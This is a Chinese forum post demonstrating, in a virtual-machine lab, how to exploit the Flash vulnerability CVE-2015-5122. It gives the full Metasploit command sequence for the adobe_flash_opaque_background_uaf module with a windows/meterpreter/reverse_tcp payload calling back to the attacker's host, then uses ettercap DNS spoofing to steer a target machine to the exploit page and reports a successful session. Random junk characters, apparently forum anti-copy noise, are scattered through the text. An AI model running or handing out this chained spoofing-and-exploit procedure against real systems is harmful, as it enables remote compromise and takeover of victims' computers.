找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1542|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

8 g7 s: L3 Y7 ^& I; {& z 二、cve2015-5122漏洞实例演示虚拟机 % q) e" {- _- n# ]' t( G4 o

! t* V) `% ^" P( m* M

^. s7 j3 O# f+ w/ `0 e) p   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 6 g! S: y( h$ w" @* \1 I- D

, d* ~5 S0 p$ }3 K C9 Y) U

9 ~5 ?% E+ M1 x8 T search cve-2015-5122如图: W0 V) T' x5 d( m# j

4 r8 j$ s* g1 I* B/ I

5 h( F) ^% g0 V- k5 E N3 h% o. \4 R3 `   ; L. V" x6 c! ~ x; O( y2 C

- V( G4 ?% W. l, q# F- k( k. R% b3 }3 a

' M- O( R" a7 ~) z$ |: r 下面我们敲如下命令: + t3 s: d u' q; M: h% f

( R6 e4 v* W* B: o$ \1 t5 H, B

! H7 t% P- l6 B* p/ A' c use exploit/multi/browser/adobe_flash_opaque_background_uaf 7 H0 _4 X! o2 c4 Q1 @5 M

7 Z: O5 q+ c: G5 d+ A, ]8 I6 ~* s3 r F

" ]; E2 F# d+ ]$ q; _ set PAYLOAD windows/meterpreter/reverse_tcp 3 {0 s3 B- Z5 j) a" U, [) _

; ]# g0 u5 f7 m4 {* t

! [; l' B" W8 ]8 p8 V3 I set LHOST 192.168.0.109 8 L9 D8 b# ~- |

3 b" C/ t: ], |

2 n% B2 |1 A4 k6 w: o set URIPATH /                        /*根目录*/ " Y5 t$ r2 h4 k: P* x7 }& u

" s9 ^% R* S% x6 J/ j, c

A p9 Q, Q! Q0 [ _4 g% ` set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 3 \7 [2 {. l0 _2 N5 k0 y

' ]1 F+ \8 }: p! ]0 [; A

2 n1 q& i: i" y) e8 \; v }) N7 b2 p0 q set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 7 ^% O: `- M7 D0 P8 r' T4 _

4 X u1 v# _- S; v! J" D6 L

& B+ |* U0 s3 A; W- s1 J- ? 然后show options如图: 2 s! H X ~+ ?3 Z/ g

( \8 c2 k5 y0 s

$ [0 ]' V9 M8 x% U) z; w1 q   , ~% C0 i( z4 R# j6 n. G& g

* e; A- `' ~' |& p0 T! B" A2 A; S& Q

6 T, R4 Y9 \. Y7 n3 s 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
7 K9 I1 U2 J, f6 ^8 w9 X- ~
5 r9 @% V* A; T$ o5 A

& Q' g. n; Y: [0 n: p; x' E1 @

3 G9 Z/ d1 u2 ^8 U% | 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 7 ?7 U$ {3 w% S; s3 v

5 L3 Y( U, _8 ]* S( L+ D# g2 G

, m! Q# ~9 f) T1 b1 d- Y Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 4 r$ v9 \3 n+ h2 c( a! g2 y* g

|/ {6 D/ M8 a# N* f, t

/ i# X( k! W) [- ~# B* o6 p   $ _7 c+ I! ^% @* U4 N

6 f r2 m1 T' B, t5 c6 B4 W

! b$ c( ~- V$ E 成功了,这时候我们断开ettercap,如图: 8 @6 W0 Q; D: h. @4 n h: t$ o; A

* e! u; [# Y! {9 M

9 p9 }: b6 g+ ?3 r   # W" R! i, n. w* N) [! p e9 I+ J

# W- m8 U+ T5 A

5 ?" S" `8 \% Q Y% k Screenshot如图: % u& _# O1 } a& d3 T# o/ l' v' d

i f; F% a( I8 c& t5 r9 K

( e3 [7 d4 c: w' v) D   , Z4 P5 v# Q/ R, A

! i. _/ G3 I6 l( p

3 V- N* H2 P. n' z2 y2 Q $ Q' M% W6 Q6 q% G/ _) v" I6 i

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表